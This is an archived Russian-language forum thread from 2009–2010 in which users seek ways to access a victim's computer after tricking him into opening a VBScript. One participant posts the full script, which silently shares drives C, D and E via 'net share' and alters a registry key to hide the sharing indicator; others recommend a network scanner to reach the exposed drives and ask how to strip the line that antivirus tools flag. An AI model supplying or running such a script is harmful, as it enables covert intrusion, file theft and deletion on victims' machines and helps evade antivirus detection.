PDA

Просмотр полной версии : Как подключится к расшариннам дискам ?


anaxanim
21.12.2009, 20:50
Вот нашел VBScript который расшаривает все диски после ого как его отроешь. Допустим я отправил какому нить ламеру эт файл и он открыл, с какой прогой можно подключится к этим диска зная IP адрес ламера ? Чтобы можно было скачать,закачать,запускать и удалят . Xshare и Shared Resource Scanner отстой. Еси кто нить знает прогу кроме этих двух буду рад еси скажете ))

pasha7
22.12.2009, 03:58
LanScope 2.9.1 Офф сайт ([Ссылки доступны только зарегистрированным пользователям])

LanScope — это многопотоковый сканер сети. Осуществляет мониторинг сети на наличие доступных ресурсов NetBios (Samba), FTP и [Ссылки доступны только зарегистрированным пользователям] сканируя заданные диапазоны IP-адресов. Показывает права доступа к ресурсам: чтение, запись. Сканер ресурсов выполняет поиск по заданному имени ресурса, например, music, video и т.п.

[Ссылки доступны только зарегистрированным пользователям]

anaxanim
24.12.2009, 21:13
LanScope 2.9.1 Офф сайт ([Ссылки доступны только зарегистрированным пользователям])

LanScope — это многопотоковый сканер сети. Осуществляет мониторинг сети на наличие доступных ресурсов NetBios (Samba), FTP и [Ссылки доступны только зарегистрированным пользователям] сканируя заданные диапазоны IP-адресов. Показывает права доступа к ресурсам: чтение, запись. Сканер ресурсов выполняет поиск по заданному имени ресурса, например, music, video и т.п.

[Ссылки доступны только зарегистрированным пользователям]
а этим можно скачать закачать или удалять файлы из компа жертвы ?

pasha7
25.12.2009, 12:33
а этим можно скачать закачать или удалять файлы из компа жертвы ?

LanScope — это многопотоковый сканер сети. Осуществляет мониторинг сети на наличие доступных ресурсов NetBios (Samba), FTP и [Ссылки доступны только зарегистрированным пользователям] сканируя заданные диапазоны IP-адресов.Показывает права доступа к ресурсам: чтение, запись. Сканер ресурсов выполняет поиск по заданному имени ресурса, например, music, video и т.п.

Всё это можно если на расшариной папке разрешено изменение файлов посети!

tracerfisher
18.04.2010, 19:00
Вот нашел VBScript который расшаривает все диски после ого как его отроешь. Допустим я отправил какому нить ламеру эт файл и он открыл, с какой прогой можно подключится к этим диска зная IP адрес ламера ? Чтобы можно было скачать,закачать,запускать и удалят . Xshare и Shared Resource Scanner отстой. Еси кто нить знает прогу кроме этих двух буду рад еси скажете ))

поделись скриптом)

pasha7
18.04.2010, 19:14
поделись скриптом)

Расшаривает диск C D E и убирает ладошку
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"net share c=c:\",0
s.run"net share d=d:\",0
s.run"net share e=e:\",0
s.regwrite"HKEY_CLASSES_ROOT\Network\SharingHandler\",""

anaxanim
20.04.2010, 21:53
Расшаривает диск C D E и убирает ладошку
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"net share c=c:\",0
s.run"net share d=d:\",0
s.run"net share e=e:\",0
s.regwrite"HKEY_CLASSES_ROOT\Network\SharingHandler\",""
да этот скрипт есть на генераторе кузья еси я не ошибаюсь . Работает но только dr Web ругается

tracerfisher
20.04.2010, 22:19
спасибо, потестю)

pasha7
21.04.2010, 18:54
да этот скрипт есть на генераторе кузья еси я не ошибаюсь

НЕ ошибаешься ! только он ещё сверху прикручивает строку 'This virus created by generator KUZJA на которую орёт касперский.

Ninja
02.05.2010, 18:33
НЕ ошибаешься ! только он ещё сверху прикручивает строку 'This virus created by generator KUZJA на которую орёт касперский.
А что эту строчку никак убрать нельзя ???